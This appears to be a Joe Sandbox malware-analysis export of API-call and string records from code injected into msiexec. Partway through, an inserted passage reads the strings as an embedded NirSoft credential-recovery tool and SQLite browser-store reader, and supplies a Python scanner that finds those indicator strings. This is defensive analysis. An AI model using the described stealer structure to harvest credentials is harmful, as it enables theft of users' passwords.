                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 290601579-0
                                                                    • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                    • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                    APIs
                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                    • memset.MSVCRT ref: 0044505E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memchrmemset
                                                                    • String ID: PD$PD
                                                                    • API String ID: 1581201632-2312785699
                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                    • String ID:
                                                                    • API String ID: 2163313125-0
                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$wcslen
                                                                    • String ID:
                                                                    • API String ID: 3592753638-3916222277
                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A47B
                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                    • String ID: %s (%s)$YV@
                                                                    • API String ID: 3979103747-598926743
                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                    • String ID: Unknown Error$netmsg.dll
                                                                    • API String ID: 2767993716-572158859
                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                    APIs
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                    • API String ID: 3176057301-2039793938
                                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                    APIs
                                                                    Strings
                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                    • database is already attached, xrefs: 0042F721
                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                    • out of memory, xrefs: 0042F865
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
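Two of the function records above carry strings that identify what was unpacked into msiexec: the HTML report template pointing at http://www.nirsoft.net/ (the embedded password-recovery tool flagged in the signatures) and the SQLite ATTACH error messages (the database layer used to read browser credential stores). The scanner below is an added example, not code from the Joe Sandbox report or from any tool it names; it searches a raw memory dump for those strings and maps each hit back to a virtual address using the 00400000 dump base shown in the records. Two things in it are my assumptions rather than facts the report states: that the report template strings are stored UTF-16LE (the function builds them with _snwprintf and wcscpy), and that the SQLite messages are narrow ASCII (SQLite is narrow-char C code). The scanner therefore tries both encodings for every string. The sample dump is constructed inline for illustration.

```python
from __future__ import annotations

from dataclasses import dataclass

# Dump base taken from the "Offset: 00400000, based on PE: true" header above.
DUMP_BASE = 0x400000

# Strings copied from the function records above (NirSoft report writer).
NIRSOFT_REPORT_STRINGS = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
    '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
    "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    '<table dir="rtl"><tr><td>',
)

# Strings copied from the function record above (SQLite ATTACH handler).
SQLITE_ATTACH_STRINGS = (
    "database %s is already in use",
    "attached databases must use the same text encoding as main database",
    "database is already attached",
    "cannot ATTACH database within transaction",
    "unable to open database: %s",
    "too many attached databases - max %d",
)


@dataclass(frozen=True)
class Hit:
    family: str    # "nirsoft" or "sqlite"
    encoding: str  # "utf-16le" or "ascii"
    offset: int    # byte offset inside the dump file
    text: str      # the indicator string that matched


def _encoded_patterns():
    # Emit every indicator in both encodings. Assumption: NirSoft strings are
    # wide and SQLite strings are narrow, but a repacked copy may differ, so
    # the scanner does not rely on that and checks both.
    for family, strings in (("nirsoft", NIRSOFT_REPORT_STRINGS),
                            ("sqlite", SQLITE_ATTACH_STRINGS)):
        for s in strings:
            yield family, "ascii", s.encode("ascii"), s
            yield family, "utf-16le", s.encode("utf-16-le"), s


def scan_dump(data: bytes) -> list[Hit]:
    """Return every occurrence of an indicator string, sorted by offset."""
    hits: list[Hit] = []
    for family, enc, pattern, text in _encoded_patterns():
        start = 0
        while (idx := data.find(pattern, start)) != -1:
            hits.append(Hit(family, enc, idx, text))
            start = idx + 1
    hits.sort(key=lambda h: h.offset)
    return hits


def to_va(offset: int, base: int = DUMP_BASE) -> int:
    """Map a dump file offset to the virtual address it was dumped from."""
    return base + offset


def families_seen(hits: list[Hit]) -> set[str]:
    """Which indicator families are present at all."""
    return {h.family for h in hits}


def build_sample_dump() -> bytes:
    # Constructed input: zero filler, one wide NirSoft string, NOP filler,
    # one narrow SQLite string. Not taken from the real sample.
    buf = bytearray(b"\x00" * 0x100)
    buf += NIRSOFT_REPORT_STRINGS[1].encode("utf-16-le") + b"\x00\x00"
    buf += b"\x90" * 0x40
    buf += SQLITE_ATTACH_STRINGS[3].encode("ascii") + b"\x00"
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()  # replace with open("<dump>.sdmp","rb").read()
    for h in scan_dump(dump):
        print(f"{to_va(h.offset):08X} {h.family:8s} {h.encoding:9s} {h.text[:40]!r}")
    print("families:", sorted(families_seen(dump and scan_dump(dump))))
```

Run it against the .sdmp file named in the records to confirm which of the two families the region actually contains; seeing both the wide report template and the narrow SQLite messages in one region is the combination that distinguishes an embedded browser-credential harvester from an unrelated SQLite user.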
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                    • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                    • String ID: ($d
                                                                    • API String ID: 1140211610-1915259565
                                                                    • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                    • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                    APIs
                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                    • String ID:
                                                                    • API String ID: 3015003838-0
                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407E44
                                                                    • memset.MSVCRT ref: 00407E5B
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 59245283-0
                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                    APIs
                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                    • API String ID: 3510742995-3273207271
                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                    • memset.MSVCRT ref: 00413ADC
                                                                    • memset.MSVCRT ref: 00413AEC
                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                    • memset.MSVCRT ref: 00413BD7
                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                    • String ID: 3A
                                                                    • API String ID: 3300951397-293699754
                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                    • String ID: strings
                                                                    • API String ID: 3166385802-3030018805
                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041249C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                    • String ID: r!A
                                                                    • API String ID: 2791114272-628097481
                                                                    • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                    • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                    • String ID: BIN
                                                                    • API String ID: 1668488027-1015027815
                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00411AF6
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                    • String ID: AE$.cfg$General$EA
                                                                    • API String ID: 776488737-1622828088
                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                    • memset.MSVCRT ref: 0040D906
                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
